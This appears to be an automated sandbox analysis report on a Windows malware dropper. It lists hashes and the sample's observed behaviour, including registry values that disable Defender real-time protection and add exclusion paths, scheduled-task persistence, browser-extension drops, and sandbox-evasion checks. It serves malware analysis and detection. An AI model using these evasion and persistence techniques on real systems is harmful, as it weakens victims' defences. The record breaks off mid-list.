Analysis
-
max time kernel
121s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
07-12-2023 17:28
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20231023-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
0faa4d38e65ff7e0f1e8134efa1895cf
-
SHA1
3a6acf2ca9b32c2db7d7cc57becf0f1a78865e18
-
SHA256
b1522b1aa5051f824a40e3ef61466b52a7bb5ba84572f3c581990b08b2155e6b
-
SHA512
b55e479d6b078038b2e1ba768ee4a934d4c7d7fc85e0c56e0dc1f682828d7a80618462b0663d7cd3b11cb3b3c36ead638415baaa83cedb0812502ca7c4a802a3
-
SSDEEP
196608:91OnB0vWiQDyndQdhiuIhU535GPCLsTzoNL:3On+OiQDyn6i9hU535Vw3oNL
Malware Config
Signatures
-
Processes:
reg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PhaWElAePoHhBdUTFeR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\szdKxxrFMiVXCdXj = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\icEyDogKU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\szdKxxrFMiVXCdXj = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\szdKxxrFMiVXCdXj = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\icEyDogKU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ycMZCyUlVfbU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\sUklQelueKqzsVVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bJazgiTXFJUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\sUklQelueKqzsVVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\szdKxxrFMiVXCdXj = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PhaWElAePoHhBdUTFeR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bJazgiTXFJUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yczsUHdtPuMxC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yczsUHdtPuMxC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ycMZCyUlVfbU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 24 2496 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
DSWBkkp.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Control Panel\International\Geo\Nation DSWBkkp.exe -
Executes dropped EXE 4 IoCs
Processes:
Install.exeInstall.exeycRIbyo.exeDSWBkkp.exepid process 2804 Install.exe 2684 Install.exe 1080 ycRIbyo.exe 1712 DSWBkkp.exe -
Loads dropped DLL 12 IoCs
Processes:
file.exeInstall.exeInstall.exerundll32.exepid process 2412 file.exe 2804 Install.exe 2804 Install.exe 2804 Install.exe 2804 Install.exe 2684 Install.exe 2684 Install.exe 2684 Install.exe 2496 rundll32.exe 2496 rundll32.exe 2496 rundll32.exe 2496 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
Processes:
DSWBkkp.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json DSWBkkp.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json DSWBkkp.exe -
Drops file in System32 directory 21 IoCs
Processes:
Install.exeDSWBkkp.exeycRIbyo.exerundll32.exepowershell.EXEpowershell.EXEpowershell.EXEpowershell.EXEdescription ioc process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA DSWBkkp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 DSWBkkp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA DSWBkkp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 DSWBkkp.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol DSWBkkp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B DSWBkkp.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol ycRIbyo.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini ycRIbyo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA DSWBkkp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA DSWBkkp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B DSWBkkp.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ycRIbyo.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 DSWBkkp.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat DSWBkkp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 DSWBkkp.exe -
Drops file in Program Files directory 13 IoCs
Processes:
DSWBkkp.exedescription ioc process File created C:\Program Files (x86)\icEyDogKU\YfJxcM.dll DSWBkkp.exe File created C:\Program Files (x86)\PhaWElAePoHhBdUTFeR\tkDoewx.xml DSWBkkp.exe File created C:\Program Files (x86)\yczsUHdtPuMxC\uGNaqiB.xml DSWBkkp.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak DSWBkkp.exe File created C:\Program Files (x86)\yczsUHdtPuMxC\MXQdvMG.dll DSWBkkp.exe File created C:\Program Files (x86)\bJazgiTXFJUn\fTCczcQ.dll DSWBkkp.exe File created C:\Program Files (x86)\PhaWElAePoHhBdUTFeR\JNqXQRZ.dll DSWBkkp.exe File created C:\Program Files (x86)\ycMZCyUlVfbU2\ZYjfJJaxfcmMe.dll DSWBkkp.exe File created C:\Program Files (x86)\ycMZCyUlVfbU2\cPywBfa.xml DSWBkkp.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi DSWBkkp.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi DSWBkkp.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja DSWBkkp.exe File created C:\Program Files (x86)\icEyDogKU\UsAnVhq.xml DSWBkkp.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\bQrKcOXclPyMmQgfTY.job schtasks.exe File created C:\Windows\Tasks\NDmpcgCvNfyvVRxht.job schtasks.exe File created C:\Windows\Tasks\NplADKkCBziqQHN.job schtasks.exe File created C:\Windows\Tasks\yWyixlOEsLxsTwFTt.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1504 schtasks.exe 2480 schtasks.exe 1452 schtasks.exe 1472 schtasks.exe 2548 schtasks.exe 656 schtasks.exe 2552 schtasks.exe 2704 schtasks.exe 2488 schtasks.exe 888 schtasks.exe 1640 schtasks.exe 2364 schtasks.exe 2380 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
rundll32.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
rundll32.exeDSWBkkp.exewscript.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{576B3482-1682-431E-9D0F-DE3E9C9DB141}\c2-9b-b4-98-ec-4e DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs DSWBkkp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-9b-b4-98-ec-4e\WpadDecisionReason = "1" DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" DSWBkkp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-9b-b4-98-ec-4e\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DSWBkkp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad DSWBkkp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{576B3482-1682-431E-9D0F-DE3E9C9DB141}\WpadNetworkName = "Network 2" DSWBkkp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-9b-b4-98-ec-4e\WpadDecisionTime = 80250b033329da01 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{576B3482-1682-431E-9D0F-DE3E9C9DB141}\WpadDecisionReason = "1" DSWBkkp.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-9b-b4-98-ec-4e\WpadDecisionTime = 80250b033329da01 DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DSWBkkp.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 DSWBkkp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{576B3482-1682-431E-9D0F-DE3E9C9DB141}\WpadDecision = "0" DSWBkkp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DSWBkkp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{576B3482-1682-431E-9D0F-DE3E9C9DB141}\WpadDecisionTime = 80250b033329da01 DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ DSWBkkp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-9b-b4-98-ec-4e\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-9b-b4-98-ec-4e\WpadDecision = "0" DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates DSWBkkp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" DSWBkkp.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c2-9b-b4-98-ec-4e DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{576B3482-1682-431E-9D0F-DE3E9C9DB141} DSWBkkp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs DSWBkkp.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXEDSWBkkp.exepid process 2904 powershell.EXE 2904 powershell.EXE 2904 powershell.EXE 1256 powershell.EXE 1256 powershell.EXE 1256 powershell.EXE 2868 powershell.EXE 2868 powershell.EXE 2868 powershell.EXE 1232 powershell.EXE 1232 powershell.EXE 1232 powershell.EXE 1712 DSWBkkp.exe 1712 DSWBkkp.exe 1712 DSWBkkp.exe 1712 DSWBkkp.exe 1712 DSWBkkp.exe 1712 DSWBkkp.exe 1712 DSWBkkp.exe 1712 DSWBkkp.exe 1712 DSWBkkp.exe 1712 DSWBkkp.exe 1712 DSWBkkp.exe 1712 DSWBkkp.exe 1712 DSWBkkp.exe 1712 DSWBkkp.exe 1712 DSWBkkp.exe 1712 DSWBkkp.exe 1712 DSWBkkp.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXEdescription pid process Token: SeDebugPrivilege 2904 powershell.EXE Token: SeDebugPrivilege 1256 powershell.EXE Token: SeDebugPrivilege 2868 powershell.EXE Token: SeDebugPrivilege 1232 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exedescription pid process target process PID 2412 wrote to memory of 2804 2412 file.exe Install.exe PID 2412 wrote to memory of 2804 2412 file.exe Install.exe PID 2412 wrote to memory of 2804 2412 file.exe Install.exe PID 2412 wrote to memory of 2804 2412 file.exe Install.exe PID 2412 wrote to memory of 2804 2412 file.exe Install.exe PID 2412 wrote to memory of 2804 2412 file.exe Install.exe PID 2412 wrote to memory of 2804 2412 file.exe Install.exe PID 2804 wrote to memory of 2684 2804 Install.exe Install.exe PID 2804 wrote to memory of 2684 2804 Install.exe Install.exe PID 2804 wrote to memory of 2684 2804 Install.exe Install.exe PID 2804 wrote to memory of 2684 2804 Install.exe Install.exe PID 2804 wrote to memory of 2684 2804 Install.exe Install.exe PID 2804 wrote to memory of 2684 2804 Install.exe Install.exe PID 2804 wrote to memory of 2684 2804 Install.exe Install.exe PID 2684 wrote to memory of 2700 2684 Install.exe forfiles.exe PID 2684 wrote to memory of 2700 2684 Install.exe forfiles.exe PID 2684 wrote to memory of 2700 2684 Install.exe forfiles.exe PID 2684 wrote to memory of 2700 2684 Install.exe forfiles.exe PID 2684 wrote to memory of 2700 2684 Install.exe forfiles.exe PID 2684 wrote to memory of 2700 2684 Install.exe forfiles.exe PID 2684 wrote to memory of 2700 2684 Install.exe forfiles.exe PID 2684 wrote to memory of 2580 2684 Install.exe forfiles.exe PID 2684 wrote to memory of 2580 2684 Install.exe forfiles.exe PID 2684 wrote to memory of 2580 2684 Install.exe forfiles.exe PID 2684 wrote to memory of 2580 2684 Install.exe forfiles.exe PID 2684 wrote to memory of 2580 2684 Install.exe forfiles.exe PID 2684 wrote to memory of 2580 2684 Install.exe forfiles.exe PID 2684 wrote to memory of 2580 2684 Install.exe forfiles.exe PID 2700 wrote to memory of 2708 2700 forfiles.exe cmd.exe PID 2700 wrote to memory of 2708 2700 forfiles.exe cmd.exe PID 2700 wrote to memory of 2708 2700 forfiles.exe cmd.exe PID 2700 wrote to memory of 2708 2700 forfiles.exe cmd.exe PID 2700 wrote to memory of 2708 2700 forfiles.exe cmd.exe PID 2700 wrote to memory of 2708 2700 forfiles.exe cmd.exe PID 2700 wrote to memory of 2708 2700 forfiles.exe cmd.exe PID 2580 wrote to memory of 2492 2580 forfiles.exe cmd.exe PID 2580 wrote to memory of 2492 2580 forfiles.exe cmd.exe PID 2580 wrote to memory of 2492 2580 forfiles.exe cmd.exe PID 2580 wrote to memory of 2492 2580 forfiles.exe cmd.exe PID 2580 wrote to memory of 2492 2580 forfiles.exe cmd.exe PID 2580 wrote to memory of 2492 2580 forfiles.exe cmd.exe PID 2580 wrote to memory of 2492 2580 forfiles.exe cmd.exe PID 2708 wrote to memory of 2644 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2644 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2644 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2644 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2644 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2644 2708 cmd.exe reg.exe PID 2708 wrote to memory of 2644 2708 cmd.exe reg.exe PID 2492 wrote to memory of 2784 2492 cmd.exe reg.exe PID 2492 wrote to memory of 2784 2492 